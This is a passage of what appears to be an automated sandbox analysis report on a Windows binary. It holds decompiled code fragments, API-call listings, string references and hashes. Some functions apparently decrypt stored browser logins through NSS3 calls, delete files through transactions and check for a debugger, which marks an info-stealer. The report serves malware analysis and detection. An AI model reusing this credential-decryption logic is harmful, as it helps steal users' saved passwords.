								 *_t57 = _t101;
							}
							E00218D26(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							E00218D26(_v16,  &(_t86[0x90]), 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t66 = GetLocaleInfoW(_v12, 0x1002,  &(_t86[0x40]), 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							E0021C222( &(_t86[0x80]), _t101,  &(_t86[0x80]), 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x232514; // 0x41
						_t75 = E00222C91(_t89, _t97, "0&#", _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E00222719(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E0022267E(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E0022267E(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}

0x00222cfa
0x00222d01
0x00222d08
0x00222d0c
0x00222d10
0x00222d1e
0x00222d23
0x00222d24
0x00222d25
0x00222d26
0x00222d2e
0x00222d30
0x00222d36
0x00222d3c
0x00222d3f
0x00222d41
0x00222d44
0x00222d48
0x00222d4f
0x00222d5c
0x00222d61
0x00222d64
0x00222d67
0x00222d67
0x00222d69
0x00222d6c
0x00222d70
0x00222de0
0x00222de2
0x00222de4
0x00222df7
0x00222df7
0x00222dfe
0x00222e04
0x00222e07
0x00000000
0x00222e07
0x00222de6
0x00222de9
0x00000000
0x00000000
0x00222def
0x00222df4
0x00000000
0x00222d77
0x00222d77
0x00222d7b
0x00222d8d
0x00222d91
0x00222d96
0x00222d9a
0x00222d9b
0x00222e23
0x00222e23
0x00222e25
0x00222e31
0x00222e3b
0x00222e3f
0x00222e41
0x00222e12
0x00222e12
0x00222e14
0x00222e22
0x00222e22
0x00222e47
0x00222e4d
0x00222e4f
0x00000000
0x00000000
0x00222e56
0x00222e5c
0x00222e5e
0x00000000
0x00000000
0x00222e60
0x00222e63
0x00222e65
0x00222e67
0x00222e67
0x00222e78
0x00222e7d
0x00222e7f
0x00222edf
0x00222ee1
0x00000000
0x00222ee1
0x00222e8e
0x00222e9e
0x00222ea4
0x00222ea6
0x00000000
0x00000000
0x00222ebd
0x00222ec3
0x00222ec5
0x00000000
0x00000000
0x00222ed7
0x00000000
0x00222edc
0x00222da1
0x00222db0
0x00222db5
0x00222dba
0x00222e0a
0x00222e0a
0x00222e0a
0x00222e0c
0x00222e10
0x00000000
0x00000000
0x00000000
0x00222e10
0x00222dbc
0x00222dbe
0x00222dc2
0x00222dd4
0x00222dd8
0x00222ddd
0x00222ddd
0x00000000
0x00222ddd
0x00222dc4
0x00222dc7
0x00000000
0x00000000
0x00222dcd
0x00000000
0x00222dcd
0x00222d7d
0x00222d80
0x00000000
0x00000000
0x00222d86
0x00000000
0x00222d86

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

Part of subcall function 002171CB: _free.LIBCMT ref: 0021722D
Part of subcall function 002171CB: _free.LIBCMT ref: 00217263

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00222DFE
IsValidCodePage.KERNEL32(00000000), ref: 00222E47
IsValidLocale.KERNEL32(?,00000001), ref: 00222E56
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00222E9E
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00222EBD

Strings

0&#, xrefs: 00222DAB

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: 0&#
API String ID: 949163717-3130248916
Opcode ID: dc2abcd28976a6a889efb277ed901d1cfce8d5f4f21c5fd7e363850309864aa5
Instruction ID: 3fa8e3527f3994f4341a4447cf37524f86dc3a14e1ff3690b05bcf7e52e5ec2f
Opcode Fuzzy Hash: dc2abcd28976a6a889efb277ed901d1cfce8d5f4f21c5fd7e363850309864aa5
Instruction Fuzzy Hash: 32518171A20226FBDB24DFE4EC45AFA73B8AF14700F054469E900E7190D7B2A9699B61

Uniqueness

Uniqueness Score: -1.00%

Function 001E0F09, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E0F0E
_strlen.LIBCMT ref: 001E0F7D
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00001FA0,00000000,00000000), ref: 001E0F85
PK11_GetInternalKeySlot.NSS3(?,00000000,00000001,?,00001FA0,00000000,00000000,?,logins,logins), ref: 001E0F93
PK11_FreeSlot.NSS3(?,?,00001FA0,00000000,00000000,?,logins,logins), ref: 001E106C

Strings

\9.., xrefs: 001E1039

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: K11_Slot$BinaryCryptFreeH_prologInternalString_strlen
String ID: \9..
API String ID: 1828113442-1559541242
Opcode ID: f5746f814851032f51acae112d54c0ce8a04e51ec5c065a873421a87fa3da2df
Instruction ID: 75d928fa9219c8dfc3413ab2bc24fde2010ff9aff8c23e5e7c423fae1142461a
Opcode Fuzzy Hash: f5746f814851032f51acae112d54c0ce8a04e51ec5c065a873421a87fa3da2df
Instruction Fuzzy Hash: 9F51D2B5D0429AEFCB10CFAAA8905FEFBB9BF15340F14446AF419E3242C7748A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00222B1D, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00222E3B,?,00000000), ref: 00222BB6
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00222E3B,?,00000000), ref: 00222BDF
GetACP.KERNEL32(?,?,00222E3B,?,00000000), ref: 00222BF4

Strings

OCP, xrefs: 00222B71
ACP, xrefs: 00222B3B
;.", xrefs: 00222BD4, 00222BAB

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ;."$ACP$OCP
API String ID: 2299586839-1466564156
Opcode ID: da339dd5a01c32d7d4c5d0768b867183aeafed063577a2fa6825e576a42bc7b9
Instruction ID: fd63d85dab12c63670fca1699bfe8608eec46862eae5cfd2d2b1193ae64b33f1
Opcode Fuzzy Hash: da339dd5a01c32d7d4c5d0768b867183aeafed063577a2fa6825e576a42bc7b9
Instruction Fuzzy Hash: CC21F532630122FADB34CFD4E801BA7B3A6EB54B29B568424F80AD7110E733DD69D750

Uniqueness

Uniqueness Score: -1.00%

Function 001EAE7B, Relevance: 9.3, APIs: 6, Instructions: 332fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001EAE80
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 001EAF89
CloseHandle.KERNEL32(00000000), ref: 001EAF97
GetFileSize.KERNEL32(00000000,00000000), ref: 001EAFD5
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001EAFFE
CloseHandle.KERNEL32(00000000), ref: 001EB005

Part of subcall function 001CB7A7: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,?,?), ref: 001CB7BA
Part of subcall function 001CB7A7: DeleteFileTransactedA.KERNEL32 ref: 001CB7D1
Part of subcall function 001CB7A7: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,?,?,?,?,001DA87D,00000012,?,?), ref: 001CB7DC

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID:
API String ID: 604483397-0
Opcode ID: c585a12ea1d4ddc86fe5e183b2ee64e97dd731a9a855c01a73afdc0ef1ff5ff1
Instruction ID: e8626681dc68645389ebd808db483628d3f0712b00a7dd9532edc06100e25f7f
Opcode Fuzzy Hash: c585a12ea1d4ddc86fe5e183b2ee64e97dd731a9a855c01a73afdc0ef1ff5ff1
Instruction Fuzzy Hash: 07E1B170C052ACDADB25DFA8D991BEEFB75AF26300F10419AE45977242DB701B48CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00206625, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0020671D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00206727
UnhandledExceptionFilter.KERNEL32(?), ref: 00206734

Strings

4hU@[Y]W, xrefs: 0020663E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: 4hU@[Y]W
API String ID: 3906539128-1563900851
Opcode ID: ec64ceea966a393c3dbb47ab8e9153e6a7ba699d8e416bd7d6e2f87caea14aa6
Instruction ID: df377e0035abb372b3f7270861c3eab9487fd2fcdda0e5ecac9cf457d20a07f3
Opcode Fuzzy Hash: ec64ceea966a393c3dbb47ab8e9153e6a7ba699d8e416bd7d6e2f87caea14aa6
Instruction Fuzzy Hash: B231A274911319ABCB21DF64D98978CBBB8AF08310F5041DAE418A72A1EB709F958F44

Uniqueness

Uniqueness Score: -1.00%

Function 001FE03E, Relevance: 4.6, APIs: 3, Instructions: 56timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 001FE076
SystemTimeToFileTime.KERNEL32(?,?), ref: 001FE084

Part of subcall function 001FD95B: FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,001FE09B,?,?), ref: 001FD970

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001FE0B6

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: f6d4fab0bd61f17227d55ea5b1e6d041c13d422127dee41a995d48ab129d3585
Instruction ID: fb0ddd19fbc9350eb180b57351b05cecafd766a6f2dcfa669a7fae8d9aca705b
Opcode Fuzzy Hash: f6d4fab0bd61f17227d55ea5b1e6d041c13d422127dee41a995d48ab129d3585
Instruction Fuzzy Hash: FE11D071804B19EFD725DFAAD8859ABFBF8FB08204B40492ED19AD3650E774A544CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0020A480, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9c003fa10c3215a23330b3ee56f6013be4fa492dffcc828c31dbb32f4ded34
Instruction ID: b57c7af464841e3276130cb04fbd17f13b0ab9b1df1ab98cd0e7ec6d9998aa48
Opcode Fuzzy Hash: cc9c003fa10c3215a23330b3ee56f6013be4fa492dffcc828c31dbb32f4ded34
Instruction Fuzzy Hash: 4BF13C71E1031A9FDF14CFA8C8806AEBBB5FF48314F658269D815AB381D731AE51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0021C559, Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,0020EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,?,?,?,?,?,00000000,00000480), ref: 0021C4E2
OutputDebugStringW.KERNEL32(?,?,0020EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,?,?,?,?,?,00000000,00000480,A:\_Work\rc-build-v1-exe\json.hpp), ref: 0021C4F9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: 5d4b34116715bd8676837d0409b0d1f26e2a3be2a849905d5d67739fa0c69522
Instruction ID: 4b4bd65173dbd4f024c011ceb85bdd1d860d13b62819d259773d195bccd891fc
Opcode Fuzzy Hash: 5d4b34116715bd8676837d0409b0d1f26e2a3be2a849905d5d67739fa0c69522
Instruction Fuzzy Hash: 9F018F790B521A77DB202E956C46BFF37CAEF25360FB80001F915E6141DA61ECF1A9A2

Uniqueness

Uniqueness Score: -1.00%

Function 0020D4CA, Relevance: 2.7, Strings: 2, Instructions: 239COMMON

Download Yara Rule

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0020D5EC
0, xrefs: 0020D662

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0$A:\_Work\rc-build-v1-exe\json.hpp
API String ID: 0-2332055066
Opcode ID: 039b56a56cbcd6260951c99f2116fe6e40434476bb004bc2192aa4e79e9efd4e
Instruction ID: 56515113ac9ede48a0fc049680b4d0bb70768cad305665f015eb52fbf1bc024d
Opcode Fuzzy Hash: 039b56a56cbcd6260951c99f2116fe6e40434476bb004bc2192aa4e79e9efd4e
Instruction Fuzzy Hash: 6261BA7063230657CF389EE89C8177EB7A9AF42308F94052AEC46DB2C3D6629C75CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0021D011, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0021D00C,?,?,00000008,?,?,002260FB,00000000), ref: 0021D23E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 1a1620d81ffe4e4adeff09e4de3ddfd24ef97961eb2a74162fe1ce662edb8c15
Instruction ID: 674ab72d703ab8054affcf2f75200ad2e807c59c16ebf21150cd5474829ab085
Opcode Fuzzy Hash: 1a1620d81ffe4e4adeff09e4de3ddfd24ef97961eb2a74162fe1ce662edb8c15
Instruction Fuzzy Hash: 33B13031620605DFD715CF2CC486BA57BE0FF55364F258658E8A9CF2A2C336E9A2CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002229F7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

Part of subcall function 002171CB: _free.LIBCMT ref: 0021722D
Part of subcall function 002171CB: _free.LIBCMT ref: 00217263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00222A4B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 87153ed846717ac23ca459943658471441645b4e9a856ea264e5b3a91ee7af2f
Instruction ID: a14ec10018ad1c8746488e0a778f7fae158f095c829a38f3e9db9434629464a5
Opcode Fuzzy Hash: 87153ed846717ac23ca459943658471441645b4e9a856ea264e5b3a91ee7af2f
Instruction Fuzzy Hash: 7421B032661226BBDB389EA5EC41ABA73A8EF54300F10007AFD01C6551EB76ED68DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0022267E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

EnumSystemLocalesW.KERNEL32(002227A4,00000001,00000000,?,?,?,00222DD2,00000000,?,?,?), ref: 002226F0

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2422f37a45b7bd991af57abd5827ba3852c91ebb6c7a7c59e8d08b5e987b1716
Instruction ID: b89aef9506a4102a99db57a123d987eb3be9f33def1e56cdaccb28b190a659da
Opcode Fuzzy Hash: 2422f37a45b7bd991af57abd5827ba3852c91ebb6c7a7c59e8d08b5e987b1716
Instruction Fuzzy Hash: E711293B214705BFDB289F79D8915BAB791FF80358B15442CE94687A40D372A856DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00222C23, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00222AA1,00000000,00000000,?), ref: 00222C4F

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 5ca0876cd8a4508ef119b025263fd50df117168f55331fe9588ea1ef499da433
Instruction ID: 0a6c25910c38ca96838e09b3331b611fc55a735282bc725f020c72c982b3ac4f
Opcode Fuzzy Hash: 5ca0876cd8a4508ef119b025263fd50df117168f55331fe9588ea1ef499da433
Instruction Fuzzy Hash: EAF04932520123FBDB245EA0DC45BBE7768EB40314F564429EC06A3040EA31FD65C691

Uniqueness

Uniqueness Score: -1.00%

Function 0022258C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

Part of subcall function 002171CB: _free.LIBCMT ref: 0021722D
Part of subcall function 002171CB: _free.LIBCMT ref: 00217263

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 002225E0

Strings

utf8, xrefs: 0022254F
0&#, xrefs: 00222408

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: 0&#$utf8
API String ID: 2003897158-3980892787
Opcode ID: 8e05f391f6c20bef28b82ef6c35561cdddcd762287008a1e1c1a54a4c062594d
Instruction ID: c7a1c1472885709cdda39b16a3d3a4ded3ace4dd639333c97d2afd1a630558b4
Opcode Fuzzy Hash: 8e05f391f6c20bef28b82ef6c35561cdddcd762287008a1e1c1a54a4c062594d
Instruction Fuzzy Hash: 9AF0F432621119BBC724ABB4EC89ABA33ECEB48314F100079E506D7281DA74AD159B50

Uniqueness

Uniqueness Score: -1.00%

Function 00222719, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

EnumSystemLocalesW.KERNEL32(002229F7,00000001,?,?,?,?,00222D96,?,?,?,?), ref: 00222763

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
